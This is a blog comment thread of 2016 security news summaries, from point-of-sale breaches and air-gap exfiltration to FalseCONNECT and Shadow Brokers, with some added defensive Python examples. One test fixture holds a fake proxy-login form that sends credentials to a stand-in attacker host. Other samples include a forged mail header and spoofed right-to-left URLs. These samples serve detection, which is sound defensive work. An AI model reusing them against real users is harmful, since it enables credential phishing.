    Dubbed MONSOON, the campaign was observed starting in May this year, but started in December 2015 and is still ongoing, researchers say. Characteristic to this campaign is the use of weaponized documents with political themes, distributed through emails specifically tailored for the targets, which are both Chinese nationals within different industries and government agencies in Southern Asia.

    One adversary, multiple names

    Reply
  14. Tomi Engdahl says:

    MICROS Hackers Targeted Five Other PoS Vendors
    http://www.securityweek.com/micros-hackers-targeted-five-other-pos-vendors

    The cybercrime gang that breached the systems of Oracle-owned point-of-sale vendor MICROS has reportedly also targeted several other similar companies.

    Oracle admitted last week that it had detected malicious code on certain legacy MICROS systems and advised customers to change their passwords for support accounts and accounts used by MICROS representatives to remotely access their on-premise systems.

    Oracle has assured customers that other services are not impacted and that payment card data is encrypted in customer environments hosted by MICROS.

    Experts involved in the investigation told security blogger Brian Krebs that the breached support portal communicated with a server associated with Carbanak, the threat actor believed to have stolen as much as one billion dollars between 2013 and 2015 from more than 100 banks worldwide. A security alert issued by Visa following the MICROS breach includes indicators of compromise (IoC), which also show a link to Carbanak.

    It appears that Oracle’s MICROS was not the only PoS vendor targeted by the group. Cybercrime monitoring company Hold Security told Forbes that the same hackers also claimed to have penetrated the systems of five other PoS system vendors, including ECRS, Cin7, PAR Technology, Navy Zebra and Uniwell.

    Reply
  15. Tomi Engdahl says:

    Hard Drive Noise Allows Data Theft From Air-Gapped Computers
    http://www.securityweek.com/hard-drive-noise-allows-data-theft-air-gapped-computers

    Researchers have identified yet another attack method that can be used to silently exfiltrate data from air-gapped computers. The latest technique involves the noise emitted by hard disk drives and it’s relatively efficient over short distances.

    A team of experts from the Cyber Security Research Center at Ben-Gurion University of the Negev in Israel have published a research paper that details a method they call “DiskFiltration.”

    Air-gapping a computer (i.e. isolating it from the Internet) is considered by many organizations a highly efficient security measure since, in theory, it should be impossible to remotely steal information from the device. However, researchers demonstrated on several occasions over the past years that the air-gap can be jumped using optic, thermal, electromagnetic and acoustic channels.

    The new method, DiskFiltration, leverages the noise emitted by hard disk drives (HDD) and solid state hard drives (SSHD). More precisely, the noise is generated by the mechanical movement of the actuator arm over the platter that stores the data.

    A piece of malware planted by attackers on the targeted air-gapped computer can conduct seek operations, which causes the actuator arm to move between different tracks. Starting and stopping a sequence of seek operations can be translated into zeros and ones, which represent bits of data.

    DiskFiltration: Data Exfiltration from Speakerless Air-Gapped
    Computers via Covert Hard Drive Noise
    https://arxiv.org/ftp/arxiv/papers/1608/1608.03431.pdf

    Reply
  16. Tomi Engdahl says:

    Gmail Flags Unauthenticated Messages, Dangerous URLs
    http://www.securityweek.com/gmail-flags-unauthenticated-messages-dangerous-urls

    Google this week added new alerts to Gmail to improve the security of its users by informing them when messages can’t be authenticated and when they contain dangerous URLs.

    Gmail is now alerting users whenever they receive a message that can’t be authenticated with either Sender Policy Framework (SPF) or DKIM, Google announced. The alert comes in the form of a question mark in place of the sender’s profile photo, corporate logo, or avatar.

    Additionally, Google is alerting Web users when they click on a URL received via email, if the link directs the user to a dangerous site known for phishing, malware, and Unwanted Software.

    Reply
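    The Gmail rule described above (flag a message unless SPF or DKIM passed) can be reproduced from the Authentication-Results header a receiving MTA stamps on each message. The block below is an added example, not Google’s code: it parses that header in the RFC 7601 shape, checks the authserv-id against the name of our own MTA (assumed here to be mx.example.net, a hypothetical name) so that a sender-injected copy of the header is ignored, and returns the badge to show next to the sender. The sample headers are constructed.

```python
import re

# Constructed sample headers (not real mail). The syntax follows RFC 7601
# Authentication-Results: the first token is the authserv-id of the MTA that
# performed the checks, followed by ";"-separated method=result clauses.
SAMPLE_HEADERS = {
    "both_pass": "Authentication-Results: mx.example.net; dkim=pass header.d=example.com; spf=pass smtp.mailfrom=example.com",
    "dkim_only": "Authentication-Results: mx.example.net; dkim=pass header.d=example.com; spf=none",
    "spf_fail":  "Authentication-Results: mx.example.net; spf=fail smtp.mailfrom=example.com; dkim=none",
    "forged":    "Authentication-Results: attacker.example; dkim=pass header.d=example.com; spf=pass",
    "missing":   "",
}

_CLAUSE_RE = re.compile(r"^(spf|dkim|dmarc)=([a-z]+)", re.IGNORECASE)


def parse_auth_results(header, trusted_authserv_id):
    """Return {method: result} from an Authentication-Results header.

    Only a header stamped by our own MTA (trusted_authserv_id, a hypothetical
    name here) counts: a sender can add an Authentication-Results header of
    their own, so anything not carrying our authserv-id is ignored.
    """
    if ":" not in header:
        return {}
    body = header.split(":", 1)[1]
    clauses = [c.strip() for c in body.split(";")]
    authserv = clauses[0].split()[0] if clauses and clauses[0].split() else ""
    if authserv != trusted_authserv_id:
        return {}
    results = {}
    for clause in clauses[1:]:
        m = _CLAUSE_RE.match(clause)
        if m:
            results.setdefault(m.group(1).lower(), m.group(2).lower())
    return results


def is_authenticated(header, trusted_authserv_id):
    """The rule the article describes: authenticated if SPF or DKIM passed."""
    results = parse_auth_results(header, trusted_authserv_id)
    return results.get("spf") == "pass" or results.get("dkim") == "pass"


def sender_badge(header, trusted_authserv_id, avatar="[logo]"):
    """What to show next to the sender: the avatar, or a question mark when unauthenticated."""
    return avatar if is_authenticated(header, trusted_authserv_id) else "?"


if __name__ == "__main__":
    for name, hdr in SAMPLE_HEADERS.items():
        print(f"{name:10s} -> {sender_badge(hdr, 'mx.example.net')}")
```

    Note that a passing SPF or DKIM result only says the message came from infrastructure authorised for the domain in the envelope or signature; it says nothing about whether that domain is the one the user expects, which is why the badge is a hint and not a verdict.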
  17. Tomi Engdahl says:

    Windows 10 needs proper privacy portal says EFF
    Slams ‘questionable tactics to cause users to download software many didn’t want’
    http://www.theregister.co.uk/2016/08/18/windows_10_needs_proper_privacy_portal_says_eff/

    The Electronic Frontier Foundation (EFF) has called on Microsoft to offer a “single unified screen” on which Windows 10 users can control how Windows 10 deals with their personal information and monitors their use of the OS.

    The organisation has listed the long list of nasty nagware tactics Microsoft used to get people running Windows 10, labelling some “questionable tactics to cause users to download a piece of software that many didn’t want.”

    https://www.eff.org/deeplinks/2016/08/windows-10-microsoft-blatantly-disregards-user-choice-and-privacy-deep-dive

    Reply
  18. Tomi Engdahl says:

    If this headline was a security warning 90% of you would ignore it
    Boffins find interrupting users with pop-ups in the middle of things just doesn’t work
    http://www.theregister.co.uk/2016/08/18/coding_pop_ups_hit_em_when_theyre_idling_university_boffins_say/

    Developers, advertisers, and scammers be warned; boffins say your pop ups will be almost universally ignored if they interrupt users.

    The work examined how users respond to web-based messages during times of varying concentration and found users who are engaged deeply in some task will ignore pop ups.

    The university quintet finds messages, notably those flagging legitimate information such as security warnings, should be displayed as soon as users land on a site, have finished watching a video, or are switching domains. At any other times, they’ll be ignored.

    The reason is that we’re collectively rubbish at multi-tasking, leading the team to say 90 percent of people clicking ignore, dismiss, or cancel when legitimate but distracting messages appear.

    Users are notorious for dismissing security warnings and patch requests pushing the technology industry to make updates automatic and silent.

    Reply
  19. Tomi Engdahl says:

    More airline outages seen as carriers grapple with aging technology
    http://www.reuters.com/article/us-delta-air-outages-it-analysis-idUSKCN10N1A3

    Airlines will likely suffer more disruptions like the one that grounded about 2,000 Delta (DAL.N) flights this week because major carriers have not invested enough to overhaul reservations systems based on technology dating to the 1960s, airline industry and technology experts told Reuters.

    Airlines have spent heavily to introduce new features such as automated check-in kiosks, real-time luggage tracking and slick mobile apps. But they have avoided the steep cost of rebuilding their reservations systems from the ground up, former airline executives said.

    Scott Nason, former chief information officer at American Airlines Group Inc (AAL.O), said long-term investments in computer technology were a tough sell when he worked there.

    “Most airlines were on the verge of going out of business for many years, so investment of any kind had to have short pay-back periods,”

    The reservations systems of the biggest carriers mostly run on a specialized IBM (IBM.N) operating system known as Transaction Processing Facility, or TPF. It was designed in the 1960s to process large numbers of transactions quickly and is still updated by IBM, which did a major rewrite of the operating system about a decade ago.

    A host of special features, ranging from mobile check-ins to seat selection and cabin upgrades, are built on top of the TPF core, or connected to it.

    U.S. and Canadian airlines are projected to spend an average of 3 percent of their revenue on information technology this year – compared to 8 percent by commercial banks and 4 percent by healthcare firms, according to Computer Economics, a firm that tracks IT spending.

    Reply
  20. Tomi Engdahl says:

    FalseCONNECT Flaw Exposes Proxy Connections to Attacks
    http://www.securityweek.com/falseconnect-flaw-exposes-proxy-connections-attacks

    Products from Apple, Microsoft, Oracle and possibly other major companies are affected by a vulnerability that exposes connections made via a proxy server to man-in-the-middle (MitM) attacks.

    The security hole, discovered by researcher Jerry Decime and dubbed “FalseCONNECT,” is caused by issues in the implementation of proxy authentication and it can result in a complete compromise of HTTPS trust.

    When a client and a server communicate over an encrypted channel, they perform a handshake where they establish a shared encryption key. If the connection goes through a proxy server, the proxy must not know the encryption key in order to ensure end-to-end security. This is achieved by using an HTTP CONNECT request, which instructs the proxy to establish a connection to the server and ensures that the proxy only acts as a data relay.

    Since these HTTP CONNECT requests are made before the HTTPS handshake, the data is sent in clear text over HTTP. This allows an MitM attacker to replace the “200 OK CONNECT” response from the proxy with a “407 Proxy Authentication Required” message and phish the victim’s credentials.

    A malicious actor can leverage this method to steal a user’s authentication credentials and session cookies and the attack would likely not raise any suspicion as the browser’s address bar still displays the padlock icon and the “https://” string.

    Anyone who relies on a proxy could be affected by the FalseCONNECT vulnerability and some users might not even know that they are vulnerable if a proxy auto-config (PAC) file is installed on their system. Decime has also pointed out that even proxies which don’t require authentication are affected.

    Until the issue is addressed by all affected vendors, users have been advised to avoid the use of proxy-configured clients when connecting to untrusted networks, and disable PAC and web proxy auto-discovery (WPAD) if they are not needed.

    http://falseconnect.com/

    Reply
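    The exchange above happens on the plaintext leg before TLS: the client sends CONNECT, and whatever answers first is believed. The block below is an added example, not code from the FalseCONNECT research or from any browser: it parses a proxy’s reply to CONNECT and applies the policy a hardened client should follow. The two responses are constructed; the 407 one carries an HTML login form the way an on-path attacker would send it, and the point of the policy is that this body is never rendered and credentials are never offered to a proxy the client did not get from an administrator.

```python
# Constructed responses standing in for what a client sees after sending
# "CONNECT bank.example:443 HTTP/1.1" to its proxy over plaintext HTTP.
PROXY_OK = b"HTTP/1.1 200 Connection established\r\n\r\n"

MITM_407 = (
    b"HTTP/1.1 407 Proxy Authentication Required\r\n"
    b"Proxy-Authenticate: Basic realm=\"Corporate Proxy\"\r\n"
    b"Content-Type: text/html\r\n\r\n"
    b"<html><form action='http://attacker.example/c'>"
    b"Proxy login: <input name=u><input name=p type=password></form></html>"
)


def parse_connect_response(raw):
    """Split a proxy response into (status, headers, body); header names are lower-cased."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    parts = lines[0].split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("HTTP/"):
        raise ValueError("not an HTTP status line")
    status = int(parts[1])
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return status, headers, body


def decide_connect(raw, proxy_set_by_admin, trusted_network):
    """Policy for the plaintext CONNECT leg.

    Returns one of:
      "tunnel"  start the TLS handshake through the proxy
      "prompt"  ask for proxy credentials in the client's own native dialog
      "abort"   drop the connection and show an error page, never the body
    """
    status, headers, body = parse_connect_response(raw)
    if status == 200:
        return "tunnel"
    if status == 407:
        scheme = headers.get("proxy-authenticate", "").split(" ", 1)[0].lower()
        # A proxy learned via PAC/WPAD rather than set by an administrator is
        # not a party the client should ever hand credentials to.
        if not proxy_set_by_admin:
            return "abort"
        # Basic sends the password base64-encoded in clear; on an untrusted
        # network (hotel, conference Wi-Fi) that is exactly the attack above.
        if scheme == "basic" and not trusted_network:
            return "abort"
        # Whatever the body contains, it is untrusted proxy output: never render it.
        return "prompt"
    return "abort"


if __name__ == "__main__":
    print("configured proxy, office:", decide_connect(MITM_407, True, True))
    print("configured proxy, hotel: ", decide_connect(MITM_407, True, False))
    print("WPAD proxy, hotel:       ", decide_connect(MITM_407, False, False))
```

    The body is parsed only so the caller can log it; the decision never depends on it. That is the behavioural difference between a vulnerable client, which displayed the 407 body as if it were the destination site (padlock and all), and a fixed one.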
  21. Tomi Engdahl says:

    Address Bar Spoofing Vulnerability Found in Several Browsers
    http://www.securityweek.com/address-bar-spoofing-vulnerability-found-several-browsers

    Chrome, Firefox and other web browsers are plagued by vulnerabilities that can be exploited to spoof their address bar. Some of the affected vendors are still working on addressing the issues.

    Pakistan-based researcher Rafay Baloch discovered that the address bar in Google Chrome, also known as the omnibox, can be tricked into flipping URLs.

    The problem, which affects Chrome for Android, is related to how Arabic and Hebrew text is written from right to left (RTL).

    “The IP address part can be easily hidden, especially on mobile browsers, by selecting a long URL (google.com/fakepath/fakepath/fakepath/… /127.0.0.1) in order to make the attack look more realistic,” Baloch explained in a blog post. “In order to make the attack more realistic, a Unicode version of the padlock can be used to demonstrate the presence of SSL.”

    A similar vulnerability was also found in Firefox for Android (CVE-2016-5267).

    Reply
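    The ingredients Baloch describes (right-to-left text in the path, a long URL that pushes the real host out of view, a padlock glyph) are all visible in the raw URL string before any rendering happens. The block below is an added example, not the researcher’s proof of concept, showing the checks a URL filter or address-bar implementation can run: explicit bidi control characters, characters from right-to-left scripts, lock glyphs, and a non-ASCII host. The sample URLs are constructed. It flags rather than blocks, because legitimate Arabic and Hebrew URLs exist; the right fix in a browser is to render the host in its own isolated run.

```python
import unicodedata
from urllib.parse import urlsplit

# Explicit bidi controls: embeddings, overrides, isolates and the LRM/RLM marks.
BIDI_CONTROLS = set("\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069\u200e\u200f")
# Glyphs that can be dropped into a URL to imitate the browser's padlock.
PADLOCK_GLYPHS = set("\U0001F512\U0001F510\U0001F50F")

# Constructed sample URLs; the attacker-controlled path segments are invented.
SAMPLES = {
    "plain": "https://google.com/search?q=test",
    "rlo": "https://google.com/fakepath/\u202e/127.0.0.1",
    "hebrew_path": "http://127.0.0.1/fakepath/\u05e9\u05dc\u05d5\u05dd/google.com",
    "padlock": "http://127.0.0.1/\U0001F512google.com",
    "idn_host": "https://xn--mgbh0fb.example/",  # punycode host: ASCII, so not flagged here
}


def rtl_spoof_findings(url):
    """Return the reasons this URL could render misleadingly; an empty list means none found."""
    findings = []
    if any(ch in BIDI_CONTROLS for ch in url):
        findings.append("bidi-control")
    # unicodedata.bidirectional() gives "R" for Hebrew and "AL" for Arabic letters.
    if any(unicodedata.bidirectional(ch) in ("R", "AL") for ch in url):
        findings.append("rtl-script")
    if any(ch in PADLOCK_GLYPHS for ch in url):
        findings.append("padlock-glyph")
    host = urlsplit(url).hostname or ""
    if any(ord(ch) > 0x7F for ch in host):
        findings.append("non-ascii-host")
    return findings


if __name__ == "__main__":
    for name, url in SAMPLES.items():
        print(f"{name:12s} {rtl_spoof_findings(url) or 'ok'}")
```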
  22. Tomi Engdahl says:

    How Secret Service Techniques Improve Cybersecurity
    http://www.securityweek.com/how-secret-service-techniques-improve-cybersecurity

    Recent news coverage has not been kind to the Secret Service, but when it comes to the organization’s core mission – protecting the President – it is hard to argue with its record.

    In the 110 years since the Secret Service began protecting the President, only seven assailants have actually reached their target, and only one has accomplished his goal.

    Here are four lessons that cybersecurity defenders can learn from the Secret Service:

    1. You can’t protect what you can’t see

    The first step to securing any location is to identify likely paths of attack. But even today, most cybersecurity defenses are based on the equivalent of a network map drawn from memory on the back of a napkin.
    Virtually every major intrusion in recent years has relied on the attackers having a better understanding the target network than its defender did.

    2. Visibility alone isn’t enough – you must reduce your attack surface

    Every environment has many attack paths, and monitoring all of them would strain available resources beyond capacity. But by limiting the pathways to the President, the Secret Service reduces risk and can concentrate its resources where they will be most effective.

    regularly analyzes data centers and cloud environments to help organizations identify and shut down their attack surface. We’ve found that even data centers with as few as 100 servers regularly have hundreds of thousands of open, port-to-port communications pathways between servers. Monitoring so many pathways risks burying defenders in alerts and false positives

    3. Prioritize your security

    By limiting the number of attack paths, the ones that pose the greatest risk quickly become obvious. The Secret Service places its valuable resources – agents, surveillance cameras – at the most important intersections and pathways.

    Many cybersecurity defenders still try to protect the interior of their data center as if every server is equally important. If you don’t visualize your data center and take steps to reduce your attack surface, you have no choice but to do this.

    Just as simplifying its environment enables the Secret Service to protect it better, simplifying the communications paths between your servers means you can quickly identify the riskiest points in your data center and use all your other security tools – honeynets, intrusion detection systems, behavioral analytics, hunt – more effectively.

    4. Focus on security consequences for your most valuable assets

    Cybersecurity defenders still frequently think of any intrusion into their data center as a failure. But statistics increasingly demonstrate that stopping all intruders at the perimeter is impossible – one recent study found that 75 percent of organizations had been breached at least once during 2015. The Secret Service understands this challenge, because they never rely on only a single layer of defense.

    Intruders have two goals: gathering information about a target environment, and exploiting that information to cause damage to a high-value asset. Instead of focusing on the perimeter as being the most important defense, we should reorient ourselves to think of the “ringfence” we draw around our high-value assets as our highest wall.

    Reply
  23. Tomi Engdahl says:

    Firmware, Controllers, and BIOS: Subterranean Malware Blues
    http://www.securityweek.com/firmware-controllers-and-bios-subterranean-malware-blues

    The Basic Input/Output System (BIOS) in our laptop, the hardware controller that runs the disk, and the Baseboard Management Controller (BMC) in our servers are all little computers that sit below the operating system and in some cases can act independently of the core CPU itself. These are the backdoors into the computer that if compromised, can subvert everything that we know from the operating system.

    To the BIOS and beyond

    However, as attackers have increased in sophistication, they realized they can get lower than the operating system itself, by going to the BIOS.

    The BIOS is an ideal location for malware, because not only is it ignored by most AV products, it remains untouched even when the operating system is wiped and reinstalled.

    The little computer that runs your hard drive

    If an attacker was able to compromise the firmware of the disk controller, then he could control the disk in ways even the operating system would be blind to. Early last year attackers were discovered that were doing just that.

    The hardwired backdoor into your data center

    Baseboard Management Controller does play a critically important role in servers. For server hardware, the BMC is quite literally the “computer-within-the-computer,” with its own processor, memory, and networking stack. Being independent of the main server hardware, it is even lower than the BIOS. It has the all-important job of monitoring and managing the fundamental health of the system such as internal temperature, fan speeds, and the operating system itself.

    Intelligent Platform Management Interface (IPMI) comes into play
    IPMI is a protocol that administrators use for remote out-of-band server management. Each hardware vendor has its own branded version of IPMI, but they are largely equivalent.

    The danger of IPMI is tied to its power. IPMI can be used to mount virtually any disk image, and replace the operating system if necessary. To do so, IPMI and the BMC work even when the main server processors aren’t running, or even when the server is powered down. The only way to disable it completely is to physically unplug the server from power.

    While IPMI offers god-like power over the server, it is typically not very well-secured or monitored. Default passwords are well-known, all too often used, and IPMI access is rarely logged.

    one of the biggest vulnerabilities lies in the physical hardware itself. This is true not just in the data center, but in our laptops as well.

    Reply
  24. Tomi Engdahl says:

    What Your Security Team Can Learn From the Olympics
    http://www.securityweek.com/what-your-security-team-can-learn-olympics

    The Olympics are such an inspirational time of year. Extraordinary athletes from around the world gather to attempt a lifelong goal of achieving Olympic gold, often the culmination of years or decades of tireless training and dedication.

    While watching some of these world-class athletes at the top of their game over the past few weeks, I started to think about the field of security, and what important lessons could be learned by considering how Olympians got to where they are. With that in mind, I came up with a few takeaways for how security teams can work together to reach cybersecurity gold.

    Bring your individual strengths. Not every security practitioner has the same skill set, just as not every athlete plays the same position.

    Remain dedicated to your craft. Athletes train for years, even decades, to make it to the Olympics. Likewise, security professionals need to remain up-to-date on current trends, threats and technologies so they are staying ahead of the bad guys.

    Consult your playbook. In sports, preparation is key.

    Adjust your tactics. Having a playbook is incredibly important to best prepare yourself for whatever conflict comes your way, either on the field or in your network. But nothing prepares you for the actual moment of attack.

    Listen to your coach. While athletes are hard at work on their individual tasks, it’s up to the coach to consider the bigger picture and how best to bring the team together to benefit the whole. Similarly, the CSO or CISO needs to be able to lead their team and consider the impact they will have on the broader organization.

    Reply
  25. Tomi Engdahl says:

    Bitcoin.org Warns of Possible State-Sponsored Attacks
    http://www.securityweek.com/bitcoinorg-warns-possible-state-sponsored-attacks

    Bitcoin.org, the organization that oversees the development of the Bitcoin software, has warned users that state-sponsored attackers will likely target the upcoming release.

    Bitcoin Core, the open source client for Bitcoin, validates the blockchain and all transactions. Bitcoin Core 0.12.1 was released in April and developers will soon make available version 0.13.0.

    In a security notice published on Wednesday, Bitcoin.org said it has reason to believe that the Bitcoin Core 0.13.0 binaries will be targeted by state-sponsored threat actors. Users have been provided an encryption key that can help verify the legitimacy of Bitcoin Core binaries.

    “We ask the Bitcoin community, and in particular the Chinese Bitcoin community to be extra vigilant when downloading binaries from our website,”

    Reply
  26. Tomi Engdahl says:

    Firewall Vendors Analyze Exploits Leaked by “Shadow Brokers”
    http://www.securityweek.com/firewall-vendors-analyze-exploits-leaked-shadow-brokers

    Cisco, Fortinet and WatchGuard have analyzed the exploits leaked recently by a threat group calling itself Shadow Brokers. While Fortinet and WatchGuard determined that the vulnerabilities were patched several years ago, Cisco did find a zero-day in its products.

    The mysterious Shadow Brokers group claims to have hacked The Equation Group, a threat actor believed to be associated with the U.S. National Security Agency (NSA). Shadow Brokers, which some speculate might be sponsored by Russia, has released 300MB of firewall exploits, implants and tools, and is offering to sell even more information for 1 million Bitcoin (valued at more than $500 million).

    Kaspersky Lab, which has conducted an extensive analysis of Equation Group tools, has confirmed that the leaked files appear to come from the NSA-linked actor, but pointed out that the files date back to 2010-2013. Nevertheless, this is still a significant leak.

    Shadow Brokers has published exploits and implants for hacking firewalls made by Fortinet, Chinese company TOPSEC, Cisco, Juniper Networks, WatchGuard and several unknown vendors.

    Reply
  27. Tomi Engdahl says:

    Organizations in 30 Countries Targeted in “Operation Ghoul”
    http://www.securityweek.com/organizations-30-countries-targeted-operation-ghoul

    Industrial, engineering and other types of organizations from around the world have been targeted in a profit-driven campaign dubbed by Kaspersky Lab “Operation Ghoul.”

    The threat group, whose activities have been traced back to March 2015, has been trying to make money by hijacking bank accounts and stealing intellectual property that they can sell to interested parties. The cybercrime gang has targeted more than 130 organizations in over 30 countries.

    According to the security firm, Operation Ghoul attacks start with a malicious email coming from a spoofed address that appears to belong to a bank. The emails typically carry a file attachment or contain links that point to phishing websites. The fake messages are mostly sent to executives, managers and other employees that could have access to valuable information.

    Reply
  28. Tomi Engdahl says:

    Report Shows Few Solutions to Filling Cyber Skills Gap
    http://www.securityweek.com/report-shows-few-solutions-filling-cyber-skills-gap

    A new report on the cyber security skills shortage from Kaspersky Lab provides few new insights and no new solutions to the problem — but it does prompt an important question. It confirms that organizations are seeking to increase their security headcount and it confirms the shortage of new security talent to enable this; but it doesn’t offer any real solution.

    Nevertheless, the report titled ‘Lack of security talent: an unexpected threat to corporate cybersafety’ is not without merit. One point it makes very well is the counter-productivity of relying on third-parties to solve any post-event problem. It notes that companies “that feel confident about their IT Security team” pay between $100,000 and $500,000 to recover from a single breach. However, those with less confidence “end up paying from $1.2 to $1.47 million.”

    A significant portion of the extra cost comes from hiring new staff ‘to pick up the pieces’, “with companies spending more on hiring external experts and paying overtime for their own team, than they actually lose in terms of business opportunities, credit rating and compensations to clients and partners.” Sadly, this is not a solution to the skills gap, but rather another consequence of it.

    “Even for junior positions, we have to find people with practical skills and knowledge of various aspects of IT. We demand knowledge of specific tools like debugging and reverse engineering software, experience with various programming languages,” says Kirill Shiryaev, Kaspersky Lab’s Head of Talent Acquisition. Technical expertise first and foremost; but it still requires 40 applicants to fill one position, he says.

    Lack of security talent: an unexpected threat to corporate cybersafety
    IT Security Risks Special Report Series 2016
    https://business.kaspersky.com/security_risks_report_lack_of_security_talent/

    Reply
  29. Tomi Engdahl says:

    Backdoor Abuses TeamViewer to Spy on Victims
    http://www.securityweek.com/backdoor-abuses-teamviewer-spy-victims

    A recently spotted backdoor Trojan abuses the legitimate TeamViewer remote access tool to spy on victims, Doctor Web security researchers warn.

    Malware that leverages the popular remote control utility for nefarious purposes isn’t unheard of, but it seems that cybercriminals are constantly searching for new ways to abuse it. Dubbed BackDoor.TeamViewerENT.1 and distributed under the name Spy-Agent, the Trojan installs legitimate TeamViewer components on the compromised machines to spy on its victims.

    Reply
  30. Tomi Engdahl says:

    F-Secure to commercialize its Riddler service.

    According to F-Secure, the Riddler service, which has been used for more than a year to look into internet-connected computers, has been a well-kept secret.

    Security company F-Secure has built, and partially released for free use, a tool called Riddler, available on the Internet at riddler.io. The site has been public for 15 months, but the company has so far kept it more or less hidden.

    The service is available to anyone, with limits. Searches show 10 results, or 20 for registered users, and can be made by, for example, web domain, operating system or destination country.

    From Riddler’s 10-20 results anyone can see what their own web domain looks like from the outside.

    - It is not a port scan. It is not a direct attack tool. The information itself is already in the public domain; this brings it into view on a larger scale, explains Janne Pirttilahti

    The openings Riddler finds would have to be combined with program code to make an actual attack.

    According to FICORA information security expert Sami Orasaari, Riddler should not be a problem.

    - It is comparable to Google, with the difference that it collects information about systems rather than content. This information is public, so I do not see a problem, Orasaari says.

    Orasaari cites as a comparison the Shodan search engine, which searches for network-connected systems.

    - There is more transparency when the information becomes available to all, says Orasaari.

    F-Secure plans to commercialize the service in the near future. Pirttilahti does not yet want to talk about the pricing model, but he says the paid side of the service will have plenty more features.

    - For example, alarms. If a new device appears in the domain, a notification can be sent to the customer.

    Pirttilahti also stresses that the service will not be sold to just anyone. The buyer may be, for example, a legitimate enterprise or a company security researcher. However, the functionality of the service is not limited to those views; the user gets views over the entire Internet.

    - We will ensure that the customer is the company or researcher they say they are.

    However, Pirttilahti admits that how the service is ultimately used is left to the user. Technically, a company could use the technology to look at its competitors.

    Sources:
    http://www.digitoday.fi/tietoturva/2016/08/18/f-secure-alkaa-myyda-keskustelua-herattanytta-nettinuuskijansa/20168604/66?rss=6
    http://www.digitoday.fi/tietoturva/2016/06/10/f-secure-teki–ja-antoi-vapaaseen-kayttoon–hurjan-nuuskintatyokalun/20166253/66

    Reply
  31. Tomi Engdahl says:

    Password strength meters promote piss-poor passwords
    You had one job …
    http://www.theregister.co.uk/2016/08/19/strength_metres_excel_at_promoting_the_worlds_weakest_passwords/

    Password strength meters used during web sites’ signup process remain incapable of doing their job, says Compound Eye developer Mark Stockley.

    Indeed, a majority of security experts consider the tools a useless control that grant little more than an illusion of protection.

    “You can’t trust password strength meters on websites,” Stockley says.

    “The passwords I used in the test are all, deliberately, absolutely dreadful … they’re chosen from a list of the 10,000 most common passwords and have characteristics I thought the password strength meters might overrate.”

    Reply
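The failure mode Stockley describes, a meter that rewards character classes while the password is a leet-spelled entry from a common-password list, as an added example that is not part of the original comment or his test; the wordlist, the leet table and the scoring scale are constructed for this example.

```python
import re

# Constructed stand-in for the "10,000 most common passwords" list the article refers to.
COMMON_PASSWORDS = {
    "password", "123456", "qwerty", "letmein", "monkey", "dragon", "football",
    "iloveyou", "trustno1", "abc123", "princess", "welcome", "sunshine",
}

# Common "leet" substitutions that a character-class meter rewards but cracking wordlists undo.
LEET = str.maketrans({"@": "a", "4": "a", "3": "e", "1": "i", "!": "i",
                      "0": "o", "$": "s", "5": "s", "7": "t"})


def naive_meter(pw):
    """A typical sign-up meter: one point per character class, one for length >= 8 (max 4)."""
    score = 0
    if len(pw) >= 8:
        score += 1
    for pattern in (r"[a-z]", r"[A-Z]", r"\d", r"[^A-Za-z0-9]"):
        if re.search(pattern, pw):
            score += 1
    return min(score, 4)


def candidate_forms(pw):
    """Forms a cracking wordlist would try: lowercased, trailing digits/symbols removed, leet undone."""
    lowered = pw.lower()
    stripped = re.sub(r"[\d\W_]+$", "", pw)   # "Monkey2016!" -> "Monkey"
    return {lowered, stripped.lower(), stripped.translate(LEET).lower()}


def blocklist_meter(pw):
    """Return (score, reason); anything reducible to a common password scores 0."""
    for form in candidate_forms(pw):
        if form in COMMON_PASSWORDS:
            return 0, f"reduces to common password '{form}'"
    return naive_meter(pw), "character-class heuristic"


if __name__ == "__main__":
    for pw in ("P@ssw0rd1!", "Monkey2016!", "abc123", "correct horse battery staple"):
        print(f"{pw!r}: naive={naive_meter(pw)} blocklist={blocklist_meter(pw)}")
```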
  32. Tomi Engdahl says:

    Twitter Says It Suspended 360,000 Suspected Terrorist Accounts in a Year
    https://www.wired.com/2016/08/twitter-says-suspended-360000-suspected-terrorist-accounts-year/

    Twitter is still actively combating terrorism on its platform, and it wants you to know so. Really and truly, the company says, it is making progress.

    For Twitter, fighting terrorism on its platform is a particularly sensitive problem. While Facebook has taken a hardline stance on terrorism and removes any and all posts that carry even a trace of suspicious content, Twitter has continually attempted to strike a balance between protecting free speech and cracking down on players who use its service as a way to promote violence or threats. As a recent WIRED feature reported, Twitter is often still the “main engine” for ISIS propagandists to promote their cause and find new recruits.

    Reply
  33. Tomi Engdahl says:

    Germany to tell people to stockpile food and water in case of attacks: FAS
    http://www.reuters.com/article/us-germany-security-stockpiling-idUSKCN10W0MJ

    For the first time since the end of the Cold War, the German government plans to tell citizens to stockpile food and water in case of an attack or catastrophe, the Frankfurter Allgemeine Sonntagszeitung newspaper reported on Sunday.

    Germany is currently on high alert after two Islamist attacks and a shooting rampage by a mentally unstable teenager last month. Berlin announced measures earlier this month to spend considerably more on its police and security forces and to create a special unit to counter cyber crime and terrorism.

    “The population will be obliged to hold an individual supply of food for ten days,” the newspaper quoted the government’s “Concept for Civil Defence” – which has been prepared by the Interior Ministry – as saying.

    The paper said a parliamentary committee had originally commissioned the civil defense strategy in 2012.

    People will be required to stockpile enough drinking water to last for five days, according to the plan, the paper said.

    Reply
  34. Tomi Engdahl says:

    Mitch Prothero / BuzzFeed:
    Belgian officials asked NSA for help in snooping on bulk cellphone metadata from a terrorist’s funeral, which helped in catching Paris attacker Salah Abdeslam

    Belgium Called In The NSA To Help Catch Paris Attacker
    https://www.buzzfeed.com/mitchprothero/belgium-called-in-the-nsa-to-help-catch-paris-attacker?utm_term=.ao0MQPpzJ5#.cggQ5WGDJO

    A breakthrough in the four-month-long manhunt for key suspect in the Paris attacks only came when Belgian officials asked the NSA for assistance, two investigators told BuzzFeed News. Read the full story here.
    https://www.buzzfeed.com/mitchprothero/why-europe-cant-find-the-jihadis-in-its-midst

    Reply
  35. Tomi Engdahl says:

    Tony Romm / Politico:
    Tech giants and rights groups urge the Department of Homeland Security to scrap proposal asking US visitors for their social media accounts

    Tech slams Homeland Security on social media screening
